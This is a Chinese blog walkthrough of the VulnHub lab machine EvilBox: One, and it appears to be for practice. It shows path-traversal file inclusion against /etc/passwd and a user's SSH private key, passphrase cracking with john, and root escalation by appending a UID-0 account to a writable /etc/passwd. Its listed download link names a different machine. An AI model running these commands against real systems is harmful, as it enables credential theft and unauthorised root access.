vulnhub刷题记录(EVILBOX: ONE)

  • 英文名称:EVILBOX: ONE
  • 中文名称:邪恶盒子:一
  • 发布日期:2021 年 8 月 16 日
  • 难度:容易
  • 描述:这适用于 VirtualBox 而不是 VMware。
  • 下载地址https://www.vulnhub.com/entry/empire-breakout,751/

1、主机发现(192.168.199.144)

b4242270cf7a02857d827e556a5c9b74.jpeg
主机发现

2、端口扫描(22、80)

e5ab846b18d64df289e26c71db27d8b5.jpeg
端口扫描

3、目录发现

[19:51:35] 200 -   12B  - /robots.txt
[19:51:35] 301 -  319B  - /secret  ->  http://192.168.199.144/secret/

aa380460d8ad06f63789dfbab513696e.jpeg
目录发现

4、寻找线索

1b15160d2d6b4f5386e9906e30b4cdba.png
疑似用户名

5、访问,空白

6d75243ae35371815b952dbb17adc546.png
空白

6、继续暴力破解

gobuster dir -u http://192.168.199.144/secret/ -w /usr/share/wordlists/dirb/big.txt -x .php

5b9b71ff34e7430b4212f77a608e4ae3.jpeg
喜的目录

7、访问,继续空白

9d7f13552ff1fa89a13301a3c60d067b.png
继续空白

8、暴力破解参数

ffuf -u 'http://192.168.199.144/secret/evil.php?FUZZ=../../../../../etc/passwd' -w "/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt" -fs 0

cab7275e8fc6194cc28f246d36d21b01.jpeg
参数

9、访问,找到用户名 mowree

c452de41cc7217c7a08a8fb3830f1c18.jpeg
文件包含

10、利用文件包含,去找密码

http://192.168.199.144/secret/evil.php?command=/home/mowree/.ssh/id_rsa

a60c5efd85a4793d9ea1bf6b879893a2.jpeg
密码

11、尝试登录,需要密码(被 passphrase 保护)

ssh -i id_rsa mowree@192.168.199.144

f49da7137ee53900456802889bf22c55.jpeg
尝试登录

12、john 暴力破解,得到密码 unicorn

ssh2john id_rsa > password 
john --show password

022ecca82d8f6832b46f77cfddda7a1f.png
密码 unicorn

13、再次登录

575e2c4c4a59d30280827d4fe6f912fa.jpeg
拿到普通flag

14、/etc/passwd 具有写权限

eee8d11ab257519b8317547d5f940257.png
w 写权限

15、生成123基于MD5的密码

mowree@EvilBoxOne:~$ openssl passwd -help
Usage: passwd [options]
Valid options are:
 -help               Display this summary
 -in infile          Read passwords from file
 -noverify           Never verify when reading password from terminal
 -quiet              No warnings
 -table              Format output as table
 -reverse            Switch table columns
 -salt val           Use provided salt
 -stdin              Read passwords from stdin
 -6                  SHA512-based password algorithm
 -5                  SHA256-based password algorithm
 -apr1               MD5-based password algorithm, Apache variant
 -1                  MD5-based password algorithm
 -aixmd5             AIX MD5-based password algorithm
 -crypt              Standard Unix password algorithm (default)
 -rand val           Load the file(s) into the random number generator
 -writerand outfile  Write random data to the specified file

871f30d8c8c92d3e4843b796f713d4b4.jpeg
生成密码

16、向passwd 写入用户ailx00的信息(注意是单引号),成功拿到root的flag

echo 'ailx00:$1$Tuse491W$mmxvOkGDQHibl4DzhH3Fe1:0:0:root:/root:/bin/bash' >> /etc/passwd

31fc1b118174bf48cfa3409471f461cb.jpeg
获得root的flag

到此,实验完成~

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ailx10

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值